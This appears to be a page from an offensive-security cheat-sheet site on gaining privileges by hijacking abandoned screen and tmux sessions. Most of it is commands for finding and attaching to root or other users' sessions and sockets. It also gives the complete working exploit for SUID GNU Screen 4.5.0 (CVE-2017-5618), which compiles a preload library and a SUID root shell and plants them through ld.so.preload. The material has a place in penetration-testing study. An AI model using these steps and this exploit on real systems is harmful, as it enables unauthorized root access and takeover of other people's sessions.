> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Screen / tmux Hijacking

> Privilege escalation by hijacking abandoned screen and tmux sessions running as root or other users.

## Overview

Screen and tmux sessions persist after the user detaches. If a privileged user left a session running and permissions allow attaching, you get their shell.

***

## Screen

### List Sessions

```bash theme={"dark"}
screen -ls
```

### List All User Sessions

```bash theme={"dark"}
ls -la /var/run/screen/
ls -la /run/screen/
```

Each directory is named `S-<username>`. Check for root sessions:

```bash theme={"dark"}
ls -la /var/run/screen/S-root/ 2>/dev/null
ls -la /run/screen/S-root/ 2>/dev/null
```

### Attach to Session

Same user:

```bash theme={"dark"}
screen -dr <session_id>
```

If multiuser mode enabled and you have ACL:

```bash theme={"dark"}
screen -x root/<session_name>
```

### SUID Screen (CVE-2017-5618)

Check if screen is SUID:

```bash theme={"dark"}
ls -la /usr/bin/screen
find / -perm -4000 -name "screen*" 2>/dev/null
```

GNU Screen 4.5.0 — local root exploit:

```bash theme={"dark"}
# Check version
screen --version
# GNU Screen version 4.05.00

https://www.exploit-db.com/exploits/41154
```

### Exploit Steps

```bash theme={"dark"}
# Create libhax.c
cat << 'EOF' > /tmp/libhax.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
__attribute__((constructor))
void dropshell(void) {
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
}
EOF

# Create rootshell.c
cat << 'EOF' > /tmp/rootshell.c
#include <stdio.h>
int main(void) {
    setuid(0); setgid(0); seteuid(0); setegid(0);
    execvp("/bin/sh", NULL);
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
```

***

## tmux

### List Sessions

```bash theme={"dark"}
tmux ls
```

### Find tmux Sockets

```bash theme={"dark"}
find /tmp -name "tmux-*" 2>/dev/null
ls -la /tmp/tmux-*/
```

Socket naming: `/tmp/tmux-<UID>/default`

### Check Root tmux

```bash theme={"dark"}
ls -la /tmp/tmux-0/ 2>/dev/null
```

### Attach to Session

Same user:

```bash theme={"dark"}
tmux attach -t <session_name>
```

### Non-default Socket

```bash theme={"dark"}
tmux -S /path/to/socket attach
```

### Writable Socket

If tmux socket is writable by your user:

```bash theme={"dark"}
ls -la /tmp/tmux-0/default
```

If writable:

```bash theme={"dark"}
tmux -S /tmp/tmux-0/default attach
```

***

## Enumerate Both

One-liner to check for hijackable sessions:

```bash theme={"dark"}
echo "=== Screen ===" && screen -ls 2>/dev/null && ls -la /var/run/screen/ /run/screen/ 2>/dev/null && echo "=== tmux ===" && tmux ls 2>/dev/null && find /tmp -name "tmux-*" -exec ls -la {} \; 2>/dev/null
```

***

## Quick Reference

| Scenario             | Command                                 |
| -------------------- | --------------------------------------- |
| List screen sessions | `screen -ls`                            |
| Attach screen        | `screen -dr <id>`                       |
| SUID screen 4.5.0    | CVE-2017-5618 exploit                   |
| List tmux sessions   | `tmux ls`                               |
| Attach tmux          | `tmux attach -t <name>`                 |
| Attach via socket    | `tmux -S /path/to/socket attach`        |
| Find all sessions    | Check `/run/screen/` and `/tmp/tmux-*/` |
